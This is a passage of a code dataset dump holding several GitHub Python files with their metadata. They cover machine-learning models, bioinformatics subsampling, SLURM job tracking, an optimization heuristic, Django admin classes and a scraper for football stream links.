torch.tensor(y_train)\r\n X_tensor_test = torch.tensor(X_test)\r\n y_tensor_test = torch.tensor(y_test)\r\n\r\n train_dataset = CustomDataset(X_tensor_train, y_tensor_train)\r\n test_dataset = CustomDataset(X_tensor_test, y_tensor_test)\r\n\r\n train_loader = torch.utils.data.DataLoader(dataset=train_dataset,batch_size=2, shuffle=True)\r\n test_loader = torch.utils.data.DataLoader(dataset=test_dataset,batch_size=2, shuffle=True)\r\n \r\n return train_loader, test_loader, X_tensor_test, y_tensor_test\r\n \r\n'''\r\nMAIN\r\n'''\r\ncross_entropy = nn.CrossEntropyLoss()\r\n\r\n#LOAD MODEL\r\nnet = Net2()\r\n#net = Net3()\r\n#net = vgg.vgg16(pretrained=True)\r\n\r\n#SAVES CURRENT BEST ACCURACY + LOAD BEST MODEL\r\n#best_model_accuracy = 0\r\n#net.load_state_dict(torch.load('90_5.ckpt'))\r\n\r\n#GET INDICES OF WRONGLY PREDICTED IMAGES IN VALIDATION SET\r\n#_,_, X_tensor_test, y_tensor_test = build_loaders()\r\n#predicted = getPredictionsValidation(X_tensor_test)\r\n#wrongs = getWrongs(predicted, y_tensor_test)\r\n\r\n#GET PREDICTED LABELS FOR THE TEST SET\r\n#predicted = predictTest() \r\n\r\n#TRAIN THE MODEL\r\n\r\n#load the datasets into a loader\r\ntrain_loader, test_loader,_,_ = build_loaders() \r\n\r\nnum_epochs = 20\r\nlearning_rate = 0.0007\r\nloss_accuracy_lr = np.zeros((20,3)) \r\n#we compare the accuracy of our newly trained model to our previous best model\r\nfor epoch in range(num_epochs):\r\n best_model_accuracy = makeItLearn(epoch, best_model_accuracy)\r\n","repo_name":"VinceBaz/COMP551_3","sub_path":"ourCode.py","file_name":"ourCode.py","file_ext":"py","file_size_in_byte":15627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"42436113834","text":"import torch.nn.functional as F\nfrom data.images import CIFAR10_NAME, TINY_IMAGENET_NAME\nfrom torch import Tensor, nn\n\nfrom models.basenet import BaseNet\n\n\nclass VanillaCNN(BaseNet):\n def __init__(self, net_id: int, class_id: int, dataset_name: str) -> None:\n super(VanillaCNN, self).__init__(net_id, class_id)\n\n assert dataset_name in [TINY_IMAGENET_NAME, CIFAR10_NAME]\n\n if dataset_name == TINY_IMAGENET_NAME:\n config = [[8, 3, 2], [16, 3, 2], [32, 3, 2], [64, 3, 2], [64, 3, 2]]\n input_size = 64\n in_ch = 3\n num_classes = 200\n else:\n config = [[8, 3, 2], [8, 3, 1], [32, 3, 2], [64, 3, 1], [64, 3, 2]]\n input_size = 32\n in_ch = 3\n num_classes = 10\n\n tot_stride = 1\n self.layers = nn.ModuleList()\n for conf in config:\n out_ch, ks, stride = conf\n self.layers.append(nn.Conv2d(in_ch, out_ch, ks, stride=stride, padding=1))\n in_ch = out_ch\n tot_stride *= stride\n\n final_size = input_size // tot_stride\n out_ch = config[-1][0]\n self.layers.append(nn.Linear(final_size * final_size * out_ch, num_classes))\n\n def forward(self, x: Tensor) -> Tensor:\n for layer in self.layers[:-1]:\n x = F.leaky_relu(layer(x))\n x = x.view(x.size()[0], -1)\n x = self.layers[-1](x)\n\n return x\n\n def func_forward(self, x: Tensor, prep: Tensor) -> Tensor:\n params = self.params_from_prep(prep)\n\n for i in range(len(self.layers[:-1])):\n stride = self.layers[i].stride\n idx = i * 2\n x = F.conv2d(x, params[idx], bias=params[idx + 1], stride=stride, padding=1)\n x = F.leaky_relu(x)\n\n x = x.view(x.size()[0], -1)\n x = F.linear(x, params[-2], bias=params[-1])\n\n return x\n","repo_name":"CVLAB-Unibo/netspace","sub_path":"models/vanillacnn.py","file_name":"vanillacnn.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
+{"seq_id":"34074162847","text":"from collections import deque\n\ndef solution(circle: deque, K: int):\n counter = 0\n while circle:\n counter += 1\n if counter % K == 0:\n print(circle.popleft(), end='')\n if circle:\n print(', ', end='')\n else:\n circle.append(circle.popleft())\n\nN, K = map(int, input().split())\ncircle = deque([i for i in range(1, N + 1)])\nprint('<', end='')\nsolution(circle, K)\nprint('>')\n","repo_name":"lawnmowing-programmer/algo","sub_path":"홍석민/week3/2023.03.13/boj11866/11866.py","file_name":"11866.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"72856865607","text":"import onnxruntime\nimport numpy as np\nimport cv2 as cv\nimport numba\nEP_list = ['CUDAExecutionProvider', 'CPUExecutionProvider']\n\nort_session = onnxruntime.InferenceSession(\"model.onnx\", providers=EP_list)\n\n@numba.njit\ndef assemblyFrame(ort_outputs, frame):\n colors =[\n [255, 0, 0],\n [255, 255, 0],\n [64, 255, 0],\n [0, 255, 255],\n [0, 64, 255],\n [255, 0, 128],\n [128, 0, 255],\n [128, 128, 128],\n [255, 128, 0],\n [0, 128, 255],\n [255, 255, 255],\n [0, 0, 0],\n [179, 130, 122],\n [222, 222, 222]\n ] \n\n # res = np.zeros([256,256,3], dtype=numba.uint8)\n res = [[[0,0,0] for _ in range(256)] for _ in range(256)]\n\n i_iter = len(ort_outputs[0][0])\n k_iter = len(ort_outputs[0][0,0])\n n_iter = len(ort_outputs[0][0,0][0])\n\n for k in range(k_iter):\n for n in range(n_iter):\n colorMax = [0.0, 13.0]\n for i in range(i_iter):\n val = ort_outputs[0][0,i][k][n]\n if val > colorMax[0]:\n colorMax = [val, i]\n\n color = colors[int(colorMax[1])]\n\n res[k][n] = color\n\n return np.array(res, dtype=np.uint8), frame\n\n\n\n \ndef processing(frame):\n resized_frame = cv.resize(frame, (256, 256)) \n frame = np.array([resized_frame[:, :, 0], resized_frame[:, :, 1], resized_frame[:, :, 2]], dtype=np.float32)\n ort_inputs = {ort_session.get_inputs()[0].name: np.array([frame])}\n ort_outputs = ort_session.run(None, ort_inputs)\n res = assemblyFrame(ort_outputs, resized_frame)\n return res\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Firesieht/organs","sub_path":"recognise.py","file_name":"recognise.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"70189327370","text":"# Python script to take an input corresponding to either a reference\n# (R4IDs) or query sequencing run, and output a random subsample of reads.\n\n# Author: Joe Parker (@lonelyjoeparker // joe@lonelyjoeparker.com)\n\n###########################################\n# Pseudocode for selecting subsets of reads\n#\n# add sequences\n#for r in read:\n#\tadd r.index to sequence hash with value r.seq\n#\tadd random to index hash with value r.index\n#\n# order by random integers\n#new keys hash = ordered random index hash\n#\n# select first n and output\n#for i in samples:\n#\tselect new keys hash [i]\n#\toutput append sequence hash [new keys hash[i]]\n\nimport argparse, random\nfrom Bio import SeqIO, SeqRecord\nfrom Bio.Seq import Seq\n\n# set up an argparse object to parse the N parameter\nparser = argparse.ArgumentParser(description='Python script to take an input corresponding to either a reference (R4IDs) or query sequencing run, and output a random subsample of reads.')\nparser.add_argument('N_subsamples', metavar='N', type=int, nargs='+', help='N - how many reads to subsample')\nparser.add_argument('input_file',type=argparse.FileType('r'),help='filename to open')\nparser.add_argument('output_file',type=argparse.FileType('w'),help='filename to write to')\n\n# evaluate the args\nargs = parser.parse_args()\n\n# set up input and output lists\ninput_sequences = {}\noutput_sequences = list()\n\n# read input\nwith args.input_file as file:\n sequence_file_iterator = SeqIO.parse(file,'fasta')\n for record in sequence_file_iterator:\n #print(record.description)\n #print(record.seq)\n input_sequences[record.id]=record\n\n file.close()\n\n#print 'total length of seqs hash dict ' + str(len(input_sequences))\n\n# pick subsamples\nfor i in range(0,args.N_subsamples[0]):\n\trandom_key = input_sequences.keys()[random.randint(0,len(input_sequences)-1)]\n\t#print str(i) + ': random key ' + random_key\n\toutput_sequences.append(input_sequences[random_key])\n\tdel input_sequences[random_key]\n\n# write output\t\nSeqIO.write(output_sequences,args.output_file,'fasta')\n","repo_name":"lonelyjoeparker/oddjects-sandbox","sub_path":"R4IDs/manuscript-analyses/simulate_partial_R4IDs.py","file_name":"simulate_partial_R4IDs.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"41184712479","text":"import os\n\n### === INITIALIZE === ###\n\nscript_name = os.path.realpath(__file__).split('/')[-1]\nwdir = os.path.realpath(__file__).split(script_name)[0]\nos.chdir(wdir)\n\n### === FUNCTIONS === ###\nprint_q = 'squeue --user=`whoami` --format=\"%.7A %.35j %.10u %.7C %.10M %.15l %.20R\"'\ndef store_job_info():\n os.system(print_q + ' > current_queue.tmp')\n file = open('current_queue.tmp','r')\n lines = file.readlines()\n file.close()\n job_names = []\n job_ids = []\n working_dirs = []\n for line in lines[1:]:\n job_name = line.split()[1]\n job_id = line.split()[0]\n os.system('scontrol show job {} > jobinfo.tmp'.format(job_id))\n file2 = open('jobinfo.tmp','r')\n lines2 = file2.readlines()\n file2.close()\n for line2 in lines2:\n if 'WorkDir' in line2:\n working_dir = line2.split('WorkDir=')[1].split('\\n')[0]\n job_names.append(job_name)\n job_ids.append(job_id)\n working_dirs.append(working_dir)\n os.system('rm current_queue.tmp')\n os.system('rm jobinfo.tmp') \n with open('.current_jobs.txt','w') as f:\n for job in range(len(job_ids)):\n f.write(job_ids[job])\n f.write('\\t')\n f.write(job_names[job])\n f.write('\\t')\n f.write(working_dirs[job])\n f.write('\\n')\n return job_ids\n\ndef find_completed_jobs(job_ids):\n file = open('.previous_jobs.txt','r')\n lines = file.readlines()\n file.close()\n count = 0\n for line in lines:\n if line.split()[0] not in job_ids:\n count += 1\n print('This job is no longer running since the last time you checked: \\n NAME: {} \\n JOB ID: {} \\n Working Directory: {}.'.format(line.split()[1],line.split()[0],line.split()[2]))\n if count == 0:\n print('No jobs have ended since the last time you checked!')\n\n\n### === MAIN === ###\nif '.current_jobs.txt' not in os.listdir():\n print('No previously submitted jobs are stored. Either the file was deleted or this is your first time running this script.')\n store_job_info()\n print('The current running jobs have now been stored. Run this script again and you should not see this message.')\n\nelse:\n os.system('mv .current_jobs.txt .previous_jobs.txt')\n job_ids = store_job_info()\n print('Jobs you are currently running:')\n print('================================================================================================================')\n os.system(print_q)\n print('================================================================================================================')\n find_completed_jobs(job_ids)\n print('================================================================================================================')\n\n","repo_name":"hklem/slurm_job_tracking","sub_path":"jobcheck.py","file_name":"jobcheck.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"}
+{"seq_id":"16660224581","text":"from lib.mongo_connection import MongoConnection\nfrom lib.linguistic_functions import get_supported_languages\nfrom nlp.config import SERVER\nfrom polyglot.load import load_embeddings\n\n\ndef add_polyglot_default():\n \"\"\"Defining default polyglot models\"\"\"\n entities = []\n load_embeddings()\n polyglot_model = [\n {\n 'model_settings': {\n 'tag': 'I-LOC',\n 'polyglot_model': 'ner2',\n 'case_sensitive': True\n },\n 'training': 'finished',\n 'available': True,\n 'type': 'default_polyglot',\n 'description': 'Trained model based on a neural network, detected locations',\n 'name': 'Detects locations'\n },\n {\n 'model_settings': {\n 'tag': 'I-PER',\n 'polyglot_model': 'ner2',\n 'case_sensitive': True\n },\n 'training': 'finished',\n 'available': True,\n 'type': 'default_polyglot',\n 'description': 'Trained model based on a neural network, detected personality',\n 'name': 'Detects persons'\n },\n {\n 'model_settings': {\n 'tag': 'I-ORG',\n 'polyglot_model': 'ner2',\n },\n 'training': 'finished',\n 'available': True,\n 'type': 'default_polyglot',\n 'description': 'Trained model based on a neural network, detected organizations',\n 'name': 'Detects organizations'\n },\n # {\n # 'model_settings': {\n # 'tag': 'negative_word',\n # 'polyglot_model': 'sentiment2',\n # 'case_sensitive': False\n # },\n # 'training': 'finished',\n # 'available': True,\n # 'type': 'default_polyglot',\n # 'description': 'Trained model based on a neural network, detected negative words',\n # 'name': 'negative words'\n # },\n # {\n # 'model_settings': {\n # 'tag': 'positive_word',\n # 'polyglot_model': 'sentiment2',\n # 'case_sensitive': False\n # },\n # 'training': 'finished',\n # 'available': True,\n # 'type': 'default_polyglot',\n # 'description': 'Trained model based on a neural network, detected positive words',\n # 'name': 'positive words'\n # },\n # {'model_settings': {'tag': 'polarity_sentence', 'polyglot_model': 'sentiment2'},\n # 'status': 'train', 'available': True, 'type': 'default_polyglot',\n # 'name': 'Polyglot default detected polarity of sentence'},\n # {'model_settings': {'tag': 'polarity_text', 'polyglot_model': 'sentiment2'},\n # 'status': 'train', 'available': True, 'type': 'default_polyglot',\n # 'name': 'Polyglot default detected polarity of document'},\n ]\n\n mongo = MongoConnection()\n for language in SERVER['language']:\n # Adding Entities\n for model in polyglot_model:\n # full_name = Language.from_code(language).name\n # if full_name in tools.list_decode(\n # downloader.supported_languages(model['model_settings']['polyglot_model'])\n # ):\n if language in get_supported_languages(model['model_settings']['polyglot_model']):\n model['language'] = language\n model['training'] = 'finished'\n model['available'] = True\n # model['user'] = DEFAULT_USER[language]\n entities.append(model)\n find_entity = model.copy()\n del find_entity['description']\n find_model = mongo.default_entity.find_one(find_entity)\n if find_model is None:\n if '_id' in model:\n del model['_id']\n try:\n # model_id = mongo.default_entity.insert(model)\n mongo.default_entity.insert(model)\n except Exception:\n print(model)\n raise\n # mongo.users.update_one(\n # {'_id': DEFAULT_USER[language]},\n # {'$addToSet': {'entity': model_id}},\n # upsert=True\n # )\n return entities\n","repo_name":"dari28/RebuildPR","sub_path":"newsAPI/install/install_default_model.py","file_name":"install_default_model.py","file_ext":"py","file_size_in_byte":4409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"8109943999","text":"import gurobipy\n\nclass LeastStopsRemovalMIP(object):\n \"\"\"\n Assume that each stop adds to the total features linearly, and therefore\n solve a Knapsack problems to maximize the utility\n \"\"\"\n def __init__(self, dict_feat_gap, dict_stop_feat_weight,dict_stop_dual_val):\n self.dict_feat_gap = dict_feat_gap # dict[feat] = gap\n self.dict_stop_feat_weight = dict_stop_feat_weight # dict[stop_id][feat] = weight removal\n self.dict_stop_dual_val = dict_stop_dual_val # dict[stop_id] = dual value\n\n # MIP parameters\n self.modelOptim = gurobipy.Model(\"MIP for removal heuristic\")\n self.modelOptim.Params.LogToConsole = 0\n self.modelOptim.modelSense = gurobipy.GRB.MINIMIZE\n self.modelOptim.Params.LogFile = 'least_stop_mip.log'\n # self.modelOptim.Params.Method = -1\n\n self.EPSILON = 0.001\n self.bigM = 10000\n self.alpha = 10 # importance given to the reduced cost\n\n # storage\n self.var_activation_stop = {} # a dict[stop_id] = var\n self.var_violation_cst = {} # a dict[feature] = var\n\n\n def _create_var_stops(self):\n \"\"\"\n Create the stop variable, binary\n \"\"\"\n for stop_id in self.dict_stop_feat_weight:\n varname = 'act_' + stop_id\n cost = 1 + self.alpha * self.dict_stop_dual_val[stop_id]\n self.var_activation_stop[stop_id] = self.modelOptim.addVar(0,1,cost,gurobipy.GRB.BINARY,varname)\n\n\n def _create_var_violation(self):\n \"\"\"\n Create the violation variable, binary\n \"\"\"\n for feat in self.dict_feat_gap:\n varname = 'violation_' + feat\n cost = 0\n self.var_violation_cst[feat] = self.modelOptim.addVar(0,1,cost,gurobipy.GRB.BINARY,varname)\n\n\n def _cst_violation_feature(self,percentage =1):\n \"\"\"\n Ensure that the violation value only takes value one if the features constraints are actually violated.\n :param percentage: the percentage of the gap to be considered\n \"\"\"\n for feature in self.dict_feat_gap:\n cst_name = 'Violation_' + feature\n gap = percentage * self.dict_feat_gap[feature]\n\n if gap >=0:\n self.modelOptim.addConstr(sum(self.var_activation_stop[stop_id] * self.dict_stop_feat_weight[stop_id][feature] for stop_id in self.var_activation_stop.keys()) - gap >=\n - (1- self.var_violation_cst[feature]) * self.bigM,\n cst_name)\n else:\n self.modelOptim.addConstr(sum(self.var_activation_stop[stop_id] * self.dict_stop_feat_weight[stop_id][feature] for stop_id in self.var_activation_stop.keys()) - gap + self.EPSILON <=\n (1- self.var_violation_cst[feature]) * self.bigM,\n cst_name)\n\n\n def _cst_at_least_one_violated(self):\n \"\"\"\n Make sure that at least one of the constraints is violated\n \"\"\"\n cst_name = \"at_least_one_violated\"\n self.modelOptim.addConstr(sum(self.var_violation_cst[feat] for feat in self.var_violation_cst.keys()) >= 1,\n cst_name)\n\n def _cst_at_least_one_stop_selected(self):\n \"\"\"\n Make sure that at least one of the stops is selected. Which may not necessarily be the case if we have to introduce\n a gap due to initial infeasibility\n \"\"\"\n cst_name = \"at_least_one_stop\"\n self.modelOptim.addConstr(sum(self.var_activation_stop[stop_id] for stop_id in self.var_activation_stop.keys()) >= 1,\n cst_name)\n\n\n def _retrieve_solution(self):\n \"\"\"\n :return: a list of selected_stop\n \"\"\"\n list_stop_id = []\n for stop_id in self.var_activation_stop:\n var = self.var_activation_stop[stop_id]\n\n if abs(var.x) >= self.EPSILON:\n list_stop_id.append(stop_id)\n\n return list_stop_id\n\n\n def _deal_with_infeasible(self):\n \"\"\"\n Deal with infeasibility problem which may arise due to the limited number of stops tested\n :return the list of selected stop_id or all_stops_id\n \"\"\"\n nb_iter = 0\n while self.modelOptim.Status == gurobipy.GRB.INFEASIBLE and nb_iter < 7:\n nb_iter += 3\n # remove all constraints\n self.modelOptim.remove(self.modelOptim.getConstrs())\n self.modelOptim.update()\n\n # re -add the constraint\n self._cst_at_least_one_violated()\n percentage = (10-nb_iter)/10\n self._cst_violation_feature(percentage)\n self.modelOptim.optimize()\n\n\n if self.modelOptim.Status == gurobipy.GRB.INFEASIBLE:\n return list(self.var_activation_stop.keys())\n else:\n return self._retrieve_solution()\n\n\n def solve(self):\n \"\"\"\n Main function, solve the knapsack problem\n :return: the list of selected stop_id\n \"\"\"\n self._create_var_stops()\n self._create_var_violation()\n self._cst_at_least_one_violated()\n self._cst_violation_feature()\n self._cst_at_least_one_stop_selected()\n\n self.modelOptim.optimize()\n\n if self.modelOptim.Status == gurobipy.GRB.INFEASIBLE:\n return self._deal_with_infeasible()\n\n else:\n return self._retrieve_solution()\n","repo_name":"jpoulletXaccount/MIT_thesis_OR_ML","sub_path":"src/optimization_step/scp_approach/heuristics_improvement/least_stops_removal_MIP.py","file_name":"least_stops_removal_MIP.py","file_ext":"py","file_size_in_byte":5519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"19082712151","text":"from django.contrib import admin\nfrom django.utils.translation import ugettext_lazy as _ul\n\nfrom apps.blogs.models import Category, Comment, Post, Tag\nfrom apps.generic.admin import GenericModelAdmin\n\n\n@admin.register(Tag)\nclass TagAdmin(GenericModelAdmin):\n pass\n\n\n@admin.register(Category)\nclass CategoryAdmin(GenericModelAdmin):\n list_display = (\n 'name',\n 'is_published',\n GenericModelAdmin.site_url,\n )\n list_filter = (\n 'is_published',\n 'categorytype'\n )\n fieldsets = (\n (None, {\n 'fields': (\n 'name',\n 'description',\n 'categorytype',\n 'image_class',\n )\n }),\n (_ul(u'Доступ'), {\n 'fields': (\n 'is_published',\n )\n }),\n (_ul(u'Seo'), {\n 'fields': (\n 'slug',\n 'seo_title',\n 'seo_description',\n 'seo_keywords',\n 'seo_author'\n )\n }),\n )\n search_fields = ('name', 'description',)\n\n\n@admin.register(Post)\nclass PostAdmin(GenericModelAdmin):\n list_display = (\n 'title',\n 'category',\n 'author',\n 'rate',\n 'view_count',\n 'num_comments',\n 'publication_date',\n 'is_published',\n GenericModelAdmin.site_url,\n )\n list_filter = (\n 'is_published',\n 'category',\n )\n fieldsets = (\n (None, {\n 'fields': (\n 'author',\n 'category',\n 'tags',\n 'title',\n 'picture',\n 'announcement',\n 'post',\n )\n }),\n (_ul(u'Доступ'), {\n 'fields': (\n 'is_published',\n 'publication_date',\n )\n }),\n (_ul(u'Seo'), {\n 'fields': (\n 'slug',\n 'seo_title',\n 'seo_description',\n 'seo_keywords',\n 'seo_author'\n )\n }),\n (_ul(u'Голосование'), {\n 'fields': (\n 'rate',\n )\n }),\n (_ul(u'Заметки'), {\n 'fields': (\n 'notes',\n )\n }),\n )\n filter_horizontal = ('tags',)\n search_fields = ('title', 'announcement',)\n\n def formfield_for_dbfield(self, db_field, *args, **kwargs):\n formfield = super(PostAdmin, self).formfield_for_dbfield(db_field, *args, **kwargs)\n if db_field.name == 'author':\n formfield.initial = kwargs['request'].user\n if db_field.name == 'seo_author':\n formfield.initial = kwargs['request'].user.get_full_name()\n if db_field.name == 'is_published':\n formfield.initial = False\n formfield.help_text = \"\"\"\n Перед публикацией разместите статью в\n \n \n Yandex оригинальные тексты\n \"\"\" # noqa\n return formfield\n\n def get_queryset(self, request):\n qs = super(PostAdmin, self).get_queryset(request)\n return qs.exclude(category__categorytype=Category.CATEGORY_QUESTIONS)\n\n class Media:\n js = (\n '/static/jquery/jquery.min.js',\n '/static/jquery/jquery.synctranslit.min.js',\n '/static/site/js/admin.js',\n )\n\n\n@admin.register(Comment)\nclass CommentAdmin(GenericModelAdmin):\n search_fields = ('comment', 'author_username', 'author__username')\n list_display = (\n 'comment',\n 'creation_date',\n 'author_username',\n 'is_published',\n 'is_spam',\n GenericModelAdmin.site_url,\n )\n list_filter = (\n 'is_spam',\n 'is_published',\n )\n list_editable = (\n 'is_spam',\n 'is_published',\n )\n fieldsets = (\n (None, {\n 'fields': (\n 'comment',\n )\n }),\n (_ul(u'Доступ'), {\n 'fields': (\n 'is_published',\n 'is_spam'\n )\n }),\n (_ul(u'Голосование'), {\n 'fields': (\n 'rate',\n )\n }),\n (_ul(u'Связи'), {\n 'fields': (\n 'parent',\n 'post',\n )\n }),\n (_ul(u'Автор'), {\n 'fields': (\n 'author',\n 'author_username',\n 'ip_address',\n )\n }),\n )\n readonly_fields = ('parent', 'post', 'author', 'author_username')\n","repo_name":"animeshinvinci/obelektrike","sub_path":"apps/blogs/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":4815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"32602022597","text":"# -*- coding: utf-8 -*-\n\nimport datetime\nimport re\n\nimport xbmc\nfrom bs4 import BeautifulSoup\n\nimport tools\nfrom lib import lang, art\nfrom lib.cache import Cache\nfrom lib.errors import WebSiteError\n\n\nclass LiveFootbalLOL:\n\n __web_url = 'http://livefootballol.me/'\n\n def __init__(self, settings):\n self.__settings = settings\n\n def get_menu(self):\n \"\"\"\n Get the list of LiveFootbalLOL categories: agenda and competitions\n\n :return: The list of LiveFootbalLOL categories\n :rtype: list\n \"\"\"\n return [\n {\n 'name': 'Hoy y mañana',\n 'icon': tools.build_path(self.__settings['path'], 'hoy_manana.png'),\n 'fanart': tools.build_path(self.__settings['path'], 'lfol_art.jpg')\n }, {\n 'name': 'Agenda 7 días',\n 'icon': tools.build_path(self.__settings['path'], 'siete_dias.png'),\n 'fanart': tools.build_path(self.__settings['path'], 'lfol_art.jpg')\n }, {\n 'name': 'Competiciones',\n 'icon': tools.build_path(self.__settings['path'], 'competiciones.png'),\n 'fanart': tools.build_path(self.__settings['path'], 'lfol_art.jpg')\n }]\n\n def __get_competition_art(self, competition):\n return {\n 'icon': art.get_competition_icon(competition, self.__settings['path'], default='futbol.png'),\n 'fanart': tools.build_path(self.__settings['path'], 'futbol_art.jpg')\n }\n\n @staticmethod\n def __get_event_name(event, date, time, competition):\n color = 'yellow'\n now = datetime.datetime.now()\n\n event_date = date.split('-')\n event_time = time.split(':')\n\n event_dt_start = datetime.datetime(\n int(event_date[2]),\n int(event_date[1]),\n int(event_date[0]),\n int(event_time[0]),\n int(event_time[1])\n )\n\n # noinspection PyTypeChecker\n if event_dt_start - datetime.timedelta(minutes=5) <= now <= event_dt_start + datetime.timedelta(hours=2):\n color = 'lime'\n elif now >= event_dt_start:\n color = 'orange'\n\n name = event.split('-')\n name = '%s - %s' % (name[0], name[1]) if len(name) == 2 else event\n\n return '[COLOR %s](%s %s:%s)[/COLOR] (%s) [B]%s[/B]' % \\\n (color, date[:5], event_time[0], event_time[1], lang.translate(competition), name)\n\n def __get_urls(self, page):\n agenda_url = None\n url = re.findall(r'href=[\\'\"]?([^\\'\" >]+).*title=\"Live Football Streaming\"', page, re.U)\n if url and len(url) == 1:\n agenda_url = url[0] if 'http' in url[0] else '%s%s' % (\n self.__web_url[:-1] if url[0].startswith('/') else self.__web_url, url[0])\n if agenda_url:\n return {'agenda': agenda_url}\n return None\n\n def get_all_events(self):\n \"\"\"\n Get all LiveFootbalLOL events\n\n :return: The list of LiveFootbalLOL events\n :rtype: list\n \"\"\"\n cache = Cache(self.__settings['path'])\n\n # Busca la URI de la agenda y los enlaces de los canales en caché\n page = cache.load(self.__web_url, False)\n if page:\n # La URI de la agenda está en caché, busca también los eventos\n events = cache.load(page['agenda'])\n if events:\n for event in events:\n event['name'] = self.__get_event_name(\n event['event'], event['date'], event['time'], event['competition'])\n return events\n\n # La URI de la agenda no está en cache\n # Vuelve a obtener la agenda y los eventos\n events = []\n\n # GET livefootballol.in\n page = tools.get_web_page(self.__web_url)\n\n # Averigua la URI de la agenda\n urls = self.__get_urls(page)\n if not urls:\n raise WebSiteError(\n u'Agenda no encontrada',\n u'Los de LiveFootbalLOL han hecho cambios en la Web',\n time=self.__settings['notify_secs']\n )\n\n # Guarda la URI de la agenda en caché\n cache.save(self.__web_url, urls)\n\n # GET agenda\n agenda = tools.get_web_page(urls['agenda'])\n\n # Obtiene la tabla de eventos\n a_events = re.findall(\n r'([0-9]{1,2}:[0-9]{2})\\s*(.*)',\n agenda,\n re.U)\n\n # Obtiene las ligas\n a_leagues = re.findall(\n r'(.*)\\s*
', page, re.U)\n\n # Obtiene la tabla de datos de los canales\n soup = BeautifulSoup(page, 'html5lib')\n table = soup.find('table', attrs={'class': 'uk-table uk-table-hover uk-table-striped'})\n\n # Obtiene los datos de los canales\n prev_lang = None\n for row in table.findAll(\"tr\")[2:]:\n cells = row.findAll(\"td\")\n\n # Obtiene los datos generales del canal\n ch_name = tools.str_sanitize(cells[1].get_text())\n ch_lang = tools.str_sanitize(cells[0].get_text())\n\n # ¿Hay ya enlaces?\n if 'will be here' in ch_name:\n match = re.findall(r'[Mm][Aa][Tt][Cc][Hh]\\s*
(.*)
', page, re.U)\n if len(channels) > 0:\n break\n else:\n raise WebSiteError(\n match[0] if match else u'LiveFootbalLOL',\n u'Todavía no se han publicado los enlaces del partido',\n time=self.__settings['notify_secs']\n )\n\n # Si no es un enlace acestream continua\n ch_link = tools.str_sanitize(cells[1].find('a').get('href'))\n if not ch_link or 'acestream' not in ch_name.lower():\n continue\n\n # Obtiene el idioma\n if not ch_lang or not re.findall(r'(\\[[A-Z]{2}\\])', ch_lang, re.U):\n ch_lang = prev_lang if prev_lang else '[--]'\n prev_lang = ch_lang if ch_lang else '[--]'\n\n # Obtiene los datos extendidos y los hashlinks del canal\n channel_data = self.__get_channel_data(cache, ch_link)\n if channel_data:\n for link in channel_data['links']:\n channels.append(\n {\n 'name': self.__get_channel_name(\n channel_data['name'],\n channel_data['bitrate'],\n link['hd'],\n ch_lang),\n 'icon': art.get_channel_icon(channel_data['name'], self.__settings['path']),\n 'fanart': tools.build_path(self.__settings['path'], 'lfol_art.jpg'),\n 'hash': link['hash']\n }\n )\n\n if len(channels) == 0:\n match = re.findall(r'[Mm][Aa][Tt][Cc][Hh]\\s*
(.*)
', page, re.U)\n raise WebSiteError(\n u'%s' % (match[0]) if match else u'LiveFootbalLOL.me',\n u'Hay enlaces del partido pero no son de acestream. Inténtalo más tarde...',\n time=self.__settings['notify_secs']\n )\n\n # Guarda los eventos en caché\n cache.save(e_url, channels)\n\n return channels\n\n @staticmethod\n def __get_channel_data(cache, url):\n \"\"\"\n Get channel data for an URL\n\n :param url: The channel URL\n :type: url: str\n :return: The Acestream channel data\n :rtype: dict\n \"\"\"\n # Busca los datos del canal en caché\n channel_data = cache.load(url, True)\n if channel_data:\n return channel_data\n\n # Los datos del canal no están en cache\n # Vuelve a obtenerlos\n\n # GET url\n page = tools.get_web_page(url)\n\n # Obtiene la tabla de canales\n soup = BeautifulSoup(page, 'html5lib')\n table = soup.find('table', attrs={'class': 'uk-table'})\n\n # Datos del canal\n ch_name = ''\n ch_sign = ''\n ch_rate = ''\n ch_links = []\n\n # Obtiene los datos del canal\n for row in table.findAll(\"tr\"):\n cells = row.findAll(\"td\")\n cell_0 = tools.str_sanitize(cells[0].get_text())\n if len(cells) == 2:\n if 'Name' in cell_0:\n ch_name = tools.str_sanitize(cells[1].get_text())\n elif 'Bitrate' in cell_0:\n ch_rate = tools.str_sanitize(cells[1].get_text())\n elif 'Signal' in cell_0:\n ch_sign = tools.str_sanitize(cells[1].get_text())\n elif 'acestream://' in cell_0:\n hashes = re.findall(\n r'[acestrm:/]*([0-9a-f]{40})', tools.str_sanitize(cells[0].find('a').get('href')), re.U)\n if hashes:\n ch_links.append({\n 'hash': hashes[0],\n 'hd': '(HD)' in cell_0\n })\n\n if len(ch_links) == 0:\n return None\n\n channel_data = {\n 'name': ch_name,\n 'bitrate': ch_rate,\n 'signal': ch_sign,\n 'links': ch_links\n }\n\n # Guarda los datos del canal en caché\n cache.save(url, channel_data)\n return channel_data\n\n @staticmethod\n def __get_channel_name(name, bitrate, is_hd, lang_code):\n color = 'yellow'\n\n kbps = bitrate.split(' ')[0]\n\n if not kbps.isdigit():\n color = 'silver'\n elif int(kbps) >= 2000:\n color = 'lime'\n elif int(kbps) < 1000:\n color = 'red'\n\n return '%s %s [COLOR %s]%s(%s)[/COLOR]' % (name, lang_code, color, '[B](HD)[/B] ' if is_hd else '', 